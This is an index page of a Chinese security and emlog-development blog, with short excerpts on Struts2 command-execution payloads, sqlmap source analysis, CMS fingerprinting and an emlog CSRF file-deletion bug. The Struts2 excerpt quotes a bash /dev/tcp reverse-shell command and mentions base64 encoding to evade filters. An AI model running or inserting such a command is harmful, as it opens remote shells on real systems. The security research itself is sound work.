各类折腾

Java Runtime.getRuntime().exec() 的那些payloads

阅读(31)评论(0)

0x01在复现struts2遇到的问题,用命令执行反弹shell的时候总是失败,经过很久的测试,怀疑是"、<>等字符出现了问题。 0x02经过漫长的探索,和公开发布的poc中的payload,找到了绕过的方法,可以用类似base64编码的方式来绕过。比如bash -c 'sh -i >& /dev/tcp/1.1.1.1/666 ...

各类折腾

博客升级计划

阅读(326)评论(1)

博客备案完成,主机终于可以迁回国内不受任何限制了,此时最适合折腾了~ 改装博客因为一些数据的历史性,加上也不想在折腾其他博客了,本来想自己写个博客的,但那时因为之前自己域名在国外,速度很慢,想做成静态化减小资源压力。但现在博客以及在国内备案,用腾讯云学生主机还是绰绰有余,所以没有自己造轮子的必要了,主要是解决一下emlog长久不更新内心存在的”不安全感”。...

Emlog大前端

emlog大前端F4.0社区版测试发布

阅读(658)评论(6)

emlog大前端社区版是emlog大前端的免费版本,仅用于个人博客 这次社区版终于更新了,因为F3.x版本已经年久失修,这次直接拿的4.9版本的内核作出的修改。在一些体验、样式和交互上会看到和4.9的体验几乎一样。 下载方式但是相比于收费版本,社区版只支持博客模式这一种模式。目前发布的是测试版本,获取方式可以在QQ群里下载...

碎碎语

博客备案完成&近期将会做的

阅读(342)评论(2)

博客域名已经备案完成,服务将会迁移到国内了。 近期会把之前挖的坑填上,正式更新emlog大前端4.9以及免费版。 因为最近博主十分喜欢Markdown这种日记方式,虽然emlog有Markdown编辑器相关的插件,但是还是需要我二次编辑图片等内容,这太不爽了。后期会在保留原始数据的基础上开发一个可以直接调用Markdown操作的博客系统。

Emlog大前端

Emlog大前端4.9 正式发布

阅读(527)评论(8)

这次发布的是测试版,修改了大量交互上的体验。我的博客已经安装上了,大家可以找找bug,正式版在30天发布。 正式版本已发布 更新内容[-] 手机端验证码开启冲突[-] 优化手机端内页面的体验[-] 优化内容页字体(模仿简书的字体样式)[-] 更换了鼠标样式[-] 更快的加载模式,鼠标移到链接上即开始加载[-] 文章页H标签样式修改[-] 文章页面版权删除...

碎碎语

最近以及未来做的

阅读(335)评论(3)

不知道为什么,我很喜欢隔一段时间就写篇总结性的文章,总结一下近期状况和未来要做的。 最近首先我发现当初无意写的w9scan的在github已经获得快500个赞了,这非常让我高兴,也加大了我开源的热情~但是是我创造的w9scan,我也很明白w9scan的弊端,扫描功能很弱,各种小bug很多,甚至我现在连他的代码结构都觉得不行,为此我也曾列出了各种修改计划甚至...

python

sqlmap早期版本(0.6.2)源码解析

阅读(364)评论(0)

直接看sqlmap代码太痛苦了,下载了一份最早期的sqlmap来研究,tag为0.6.2,这样应该可以看到sqlmap内核中最精彩的部分吧~ 目标是了解sqlmap是怎么进行注入判断,然后自己写一款注入检测工具。 环境下载地址:https://github.com/sqlmapproject/sqlmap/tree/0.6.2 VSCODE + Pyt...

新奇想法

基于决策树加快cms识别

阅读(274)评论(0)

最近在写Aireye(全网网络资产收集系统),模仿zoomeye项目,但是指纹识别的时候如果用指纹库扫描,指纹越大,则效率会越慢。虽然在w11scan的项目中有通过正确率来拉取最高的指纹,但是依然没有解决该问题。 决策树通过各自决策来增加该CMS的权值,当权值大于某个值时,即可判断该CMS。这样就解决了指纹越大,而效率越慢的问题了。 如何进行决策呢?先统...

emlog

Emlog新版一处csrf导致的任意文件删除(可删除全站)

阅读(1293)评论(5)

听说emlog更新到6.0了,下载了一份最新的代码,发现原来的bug还是没有修复。可能是官方没有在意,所以这里简单叙述一下危害。 出现的地方 在admin/data.php139行 if ($action == 'dell_all_bak') { if (!isset($_POST['bak'])) { ...

各类折腾

CMS在线识别(三)数据统计

阅读(652)评论(0)

在全网扫描时,对CMS指纹进行分析,想法是仅从首页或者一些地方就可以获取到,尽量不使用指纹库中庞大的路径扫描。 同时也统计排名Top使用的cms,数据为airbug项目提供参考。 查询语句: SELECT result,count(id) as total FROM `whatcms_result` group by re...